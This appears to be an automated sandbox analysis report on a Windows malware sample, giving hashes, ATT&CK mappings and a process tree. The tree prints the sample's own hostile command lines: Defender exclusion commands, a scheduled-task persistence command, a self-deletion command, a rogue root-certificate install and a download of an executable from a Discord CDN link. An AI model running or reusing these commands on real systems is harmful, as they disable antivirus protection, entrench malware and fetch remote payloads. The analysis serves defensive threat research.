d78e0011d88c18f1112d29e0f06e443291d560cd2b60481e7f9c637b85ab5655

Analysis

max time kernel
147s
max time network
124s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09-10-2024 04:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
Size

659KB
MD5

2b07301cc54a9b929bede689a4746e66
SHA1

33f5ab7d47163d08d677522e4eabad3777269da2
SHA256

d78e0011d88c18f1112d29e0f06e443291d560cd2b60481e7f9c637b85ab5655
SHA512

a3b2e6cde7855cdec911e84b3cfa3369264a97e431a43c118fe0d668cd38b435503b4edb82ed9f54887383b2ef95d23d2d5469579c4279b1d67e7b21d9a94ff3
SSDEEP

12288:K+38DKkPiYRvUEHHOWAap90A6In+CkjFGxk04xrW:18DKkP3dHHuTICQB

Score

8^/10

discovery execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2648	powershell.exe
352	powershell.exe
1848	powershell.exe
2380	powershell.exe
1764	powershell.exe
1752	powershell.exe
2316	powershell.exe
2692	powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
2500	WindowsDefender.exe
2120	UpdateChecker.exe
2756	extd.exe
2716	extd.exe
2948	extd.exe
1768	extd.exe
2436	svchost32.exe
2760	services32.exe
2068	svchost32.exe
2304	sihost32.exe

Loads dropped DLL 16 IoCs

pid	Process
1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
2312	Process not Found
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
2232	cmd.exe
3036	cmd.exe
2436	svchost32.exe
2088	cmd.exe
2068	svchost32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\services32.exe	svchost32.exe
File opened for modification	C:\Windows\system32\services32.exe	svchost32.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	svchost32.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000018be7-25.dat	upx
behavioral1/memory/2756-31-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2756-33-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2716-38-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2716-41-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2948-48-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/2948-64-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/1768-88-0x0000000140000000-0x00000001400D8000-memory.dmp	upx
behavioral1/memory/1768-99-0x0000000140000000-0x00000001400D8000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTEPAD.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	svchost32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	svchost32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	svchost32.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1128	schtasks.exe
2864	schtasks.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2692	powershell.exe
2648	powershell.exe
352	powershell.exe
1848	powershell.exe
2436	svchost32.exe
2380	powershell.exe
1764	powershell.exe
1752	powershell.exe
2316	powershell.exe
2068	svchost32.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	352	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	2436	svchost32.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2068	svchost32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1836 wrote to memory of 2500	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	30
PID 1836 wrote to memory of 2500	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	30
PID 1836 wrote to memory of 2500	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	30
PID 1836 wrote to memory of 2500	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	30
PID 1836 wrote to memory of 2120	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	31
PID 1836 wrote to memory of 2120	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	31
PID 1836 wrote to memory of 2120	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	31
PID 1836 wrote to memory of 2120	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	31
PID 1836 wrote to memory of 2108	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	33
PID 1836 wrote to memory of 2108	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	33
PID 1836 wrote to memory of 2108	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	33
PID 1836 wrote to memory of 2108	1836	2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe	33
PID 2120 wrote to memory of 2232	2120	UpdateChecker.exe	34
PID 2120 wrote to memory of 2232	2120	UpdateChecker.exe	34
PID 2120 wrote to memory of 2232	2120	UpdateChecker.exe	34
PID 2232 wrote to memory of 2756	2232	cmd.exe	35
PID 2232 wrote to memory of 2756	2232	cmd.exe	35
PID 2232 wrote to memory of 2756	2232	cmd.exe	35
PID 2232 wrote to memory of 2716	2232	cmd.exe	36
PID 2232 wrote to memory of 2716	2232	cmd.exe	36
PID 2232 wrote to memory of 2716	2232	cmd.exe	36
PID 2232 wrote to memory of 2948	2232	cmd.exe	37
PID 2232 wrote to memory of 2948	2232	cmd.exe	37
PID 2232 wrote to memory of 2948	2232	cmd.exe	37
PID 2500 wrote to memory of 2244	2500	WindowsDefender.exe	38
PID 2500 wrote to memory of 2244	2500	WindowsDefender.exe	38
PID 2500 wrote to memory of 2244	2500	WindowsDefender.exe	38
PID 2244 wrote to memory of 2692	2244	cmd.exe	40
PID 2244 wrote to memory of 2692	2244	cmd.exe	40
PID 2244 wrote to memory of 2692	2244	cmd.exe	40
PID 2244 wrote to memory of 2648	2244	cmd.exe	42
PID 2244 wrote to memory of 2648	2244	cmd.exe	42
PID 2244 wrote to memory of 2648	2244	cmd.exe	42
PID 2244 wrote to memory of 352	2244	cmd.exe	43
PID 2244 wrote to memory of 352	2244	cmd.exe	43
PID 2244 wrote to memory of 352	2244	cmd.exe	43
PID 2244 wrote to memory of 1848	2244	cmd.exe	44
PID 2244 wrote to memory of 1848	2244	cmd.exe	44
PID 2244 wrote to memory of 1848	2244	cmd.exe	44
PID 2232 wrote to memory of 1768	2232	cmd.exe	45
PID 2232 wrote to memory of 1768	2232	cmd.exe	45
PID 2232 wrote to memory of 1768	2232	cmd.exe	45
PID 2500 wrote to memory of 3036	2500	WindowsDefender.exe	46
PID 2500 wrote to memory of 3036	2500	WindowsDefender.exe	46
PID 2500 wrote to memory of 3036	2500	WindowsDefender.exe	46
PID 3036 wrote to memory of 2436	3036	cmd.exe	48
PID 3036 wrote to memory of 2436	3036	cmd.exe	48
PID 3036 wrote to memory of 2436	3036	cmd.exe	48
PID 2436 wrote to memory of 884	2436	svchost32.exe	49
PID 2436 wrote to memory of 884	2436	svchost32.exe	49
PID 2436 wrote to memory of 884	2436	svchost32.exe	49
PID 884 wrote to memory of 1128	884	cmd.exe	51
PID 884 wrote to memory of 1128	884	cmd.exe	51
PID 884 wrote to memory of 1128	884	cmd.exe	51
PID 2436 wrote to memory of 2760	2436	svchost32.exe	52
PID 2436 wrote to memory of 2760	2436	svchost32.exe	52
PID 2436 wrote to memory of 2760	2436	svchost32.exe	52
PID 2436 wrote to memory of 1356	2436	svchost32.exe	53
PID 2436 wrote to memory of 1356	2436	svchost32.exe	53
PID 2436 wrote to memory of 1356	2436	svchost32.exe	53
PID 1356 wrote to memory of 2768	1356	cmd.exe	55
PID 1356 wrote to memory of 2768	1356	cmd.exe	55
PID 1356 wrote to memory of 2768	1356	cmd.exe	55
PID 2760 wrote to memory of 2036	2760	services32.exe	56

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2b07301cc54a9b929bede689a4746e66_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1836
- C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
  "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\system32\cmd.exe
    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1848
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Users\Admin\AppData\Local\Temp\svchost32.exe
      C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2436
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:884
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1128
    - - C:\Windows\system32\services32.exe
        
        "C:\Windows\system32\services32.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2760
      - C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        6⤵
        
        PID:2036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        6⤵
        Loads dropped DLL
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in System32 directory
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        8⤵
        
        PID:2524
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2864
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        8⤵
        Executes dropped EXE
        
        PID:2304
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        8⤵
        
        PID:2196
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        9⤵
        
        PID:644
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1356
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:2768
- C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe
  "C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2120
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\C5F0.bat C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:2756
  - - C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:2716
  - - C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/872884812841648218/1622305117.exe" "1622305117.exe" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:2948
  - - C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe
      C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
      4⤵
      Executes dropped EXE
      PID:1768
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ERROR REPORT.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f17cfb71c1d3347027303d2f01d0e229

SHA1
f8328e4f5719491337fccc3793bc26ec5d03d27d

SHA256
e835859b8768ea86eb1a5996cd749a7f9b3987b92236d11835212898272b9ce5

SHA512
4a8391d8d25359a7c7f87ef1648291524cee50a6b9e73158317dd3ed5cd2454bc64882663081c933fd8e18e06ce177236e20b3f20c17692d783c081d395a940c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
b2df9fe3196ad9ec36c8e21af1b132a8

SHA1
884349ff97d168e1fc5f8a562b2aee03da65c418

SHA256
db931aa3fff59637e18d4cd011bb00308e487e82a88fc539f1927e8beade5621

SHA512
ec6274beddbedee3a09085176444c39350647da6ba16de7e75b071db15a8fd6d86c2094abdd0705d6c1f5bd470b45aee3630ae9e7c46b94b2f3c96c65491cab3

Download Submit
C:\Users\Admin\AppData\Local\Temp\C5EE.tmp\C5EF.tmp\C5F0.bat

Filesize
943B

MD5
578845307ffd5188017326556cd446ba

SHA1
22bb73617db786fd1ee56cd04c2d2ea101c77d4c

SHA256
29d632e0de726446ca4685b00126630fc95d53b86925a5d22d6e2d03e19edd84

SHA512
89bb011078bff25ee0c44d37772734ba794e045f5aa66d7b101317584d0e5d8feb80a20fc3d0ca5f3bcfc47e772c5bfe61a36606618d2b72c6a524730a2d6a75

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5E77.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ERROR REPORT.txt

Filesize
617B

MD5
292806f9ebd655b601d4fe9e9c482d9f

SHA1
be73ffc844d1071a6a98131861c39e29ca5b8d8c

SHA256
c7c19f3cb0e3c8f820c36fa809d20ed776d2312314b81e1ccb6098fdc541c55e

SHA512
a3468990b4867f3722de1040cdd720cc72cfa590b3643db1aa6a8d5293e4a09f73c5f9f7f5914cd2bf5d0a1cdc6283e9396bfd90574a41003d8397fa67bcc6dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5E8A.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
